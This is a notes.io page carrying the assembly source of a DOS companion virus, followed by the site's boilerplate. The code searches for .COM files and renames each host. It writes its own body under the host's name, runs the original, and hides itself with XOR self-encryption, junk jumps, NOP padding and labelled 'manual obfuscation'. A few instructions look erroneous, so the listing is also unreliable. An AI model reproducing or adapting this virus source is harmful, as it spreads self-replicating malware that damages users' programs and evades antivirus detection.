Notes
Notes - notes.io |
.code
org 100h
encrypt_code db 0 ;encryption key
DECRYPT: ;encrypt & decrypt function
ENCRYPT:
mov ah, encrypt_code
mov cx,ENCRYPT_END - ENCRYPT_START
mov di, OFFSET ENCRYPT_START
mov di,si
XOR_LOOP: ;XOR encryption
lodsb
xor al,ah
stosb
loop XOR_LOOP
ret
jmp labelvirus1 ;jump to useless label
labelvirus2: ;random code in label
mov bx,10
pop bx
mov bx,0
jmp labelvirus3
CSpawn:
nop ;nop
call ENCRYPT ;encrypt call
MOV SP, offset FINISH + 100h
MOV AH, 4AH
MOV BX,SP
MOV CL,4
SHR BX,CL
INC BX
INT 21H
nop ;nop
MOV BX,2Ch
MOV AX,[BX]
MOV WORD PTR [PARAM_BLK],AX
MOV AX,CS
MOV WORD PTR [PARAM_BLK+4],AX
MOV WORD PTR [PARAM_BLK+8],AX
MOV WORD PTR [PARAM_BLK+12],AX
nop ;nop
MOV DX,offset REAL_NAME
MOV BX,offset PARAM_BLK
MOV AX,4B00h
INT 21h
nop ;nop
CLI
mov bx,ax
mov ax,cs
mov ss,ax
mov sp,(FINISH - CSpawn) + 200H
sti
push bx
mov ds,ax
nop ;nop
mov es,ax
mov ah,1AH
mov dx,80H
int 21H
nop ;nop
call FILES_FINDER
pop ax
mov ah,4CH
int 21H
call DECRYPT ;decrypt call
nop ;nop
labelvirus1: ;random code in label
mov cx,10
pop cx
jmp labelvirus2 ;jump to useless label
FILES_FINDER:
nop ;nop
mov dx,OFFSET COM_MASK
mov ah,4EH
mov cx,dx ;manual obfuscation
push cx ;manual obfuscation
pop cx ;manual obfuscation
mov cx,dx ;manual obfuscation
xor dx,dx ;manual obfuscation
mov dx,cx ;manual obfuscation
mov cx,0 ;substitute -> xor cx,cx
FIND_LOOP:
nop ;nop
int 21H
jc LOOP_EXIT
call FILE_BOMB
mov ah,4FH
jmp FIND_LOOP
LOOP_EXIT: ret
COM_MASK db '*.COM',0
labelvirus3: ;random code, move values to cx, pop and push register, xor itself to become 0
mov cx,10
pop cx
mov cx,5
push cx
pop cx
mov cx,0
xor cx,cx
jmp labelvirus4 ;jump to useless label
ENCRYPT_START: ;starting part of code encrypted
FILE_BOMB:
nop ;nop
mov si,9EH
mov di,OFFSET REAL_NAME
INF_LOOP:
nop ;nop
lodsb
stosb
or al,al
jnz INF_LOOP
mov WORD PTR [di-2],'N'
mov dx,9EH
nop ;nop
mov di,OFFSET REAL_NAME
mov ah,56H
int 21H
jc BREAK_LOOP
nop ;nop
mov ah,3CH
mov cx,2
nop ;nop
int 21H
mov bx,ax
mov ah,40H
mov cx,FINISH - CSpawn
mov dx,OFFSET CSpawn
int 21H
mov ah,3EH
int 21H
nop ;nop
BREAK_LOOP: ret
REAL_NAME db 13 dup (?)
PARAM_BLK DW ?
DD 80H
DD 5CH
DD 6CH
ENCRYPT_END: ;ending part of code encrypted
labelvirus4: ;random code, dropping values to cx, push pop him and xor itself to become 0
mov cx,3
push cx
pop cx
xor cx,cx
jmp CSpawn ;jump on beggining of the virus
FINISH:
end CSpawn
|
|
Notes.io is a web-based application for taking notes. You can take your notes and share with others people. If you like taking long notes, notes.io is designed for you. To date, over 8,000,000,000 notes created and continuing...
With notes.io;
- * You can take a note from anywhere and any device with internet connection.
- * You can share the notes in social platforms (YouTube, Facebook, Twitter, instagram etc.).
- * You can quickly share your contents without website, blog and e-mail.
- * You don't need to create any Account to share a note. As you wish you can use quick, easy and best shortened notes with sms, websites, e-mail, or messaging services (WhatsApp, iMessage, Telegram, Signal).
- * Notes.io has fabulous infrastructure design for a short link and allows you to share the note as an easy and understandable link.
Fast: Notes.io is built for speed and performance. You can take a notes quickly and browse your archive.
Easy: Notes.io doesn’t require installation. Just write and share note!
Short: Notes.io’s url just 8 character. You’ll get shorten link of your note when you want to share. (Ex: notes.io/q )
Free: Notes.io works for 12 years and has been free since the day it was started.
You immediately create your first note and start sharing with the ones you wish. If you want to contact us, you can use the following communication channels;
Email: [email protected]
Twitter: http://twitter.com/notesio
Instagram: http://instagram.com/notes.io
Facebook: http://facebook.com/notesio
Regards;
Notes.io Team
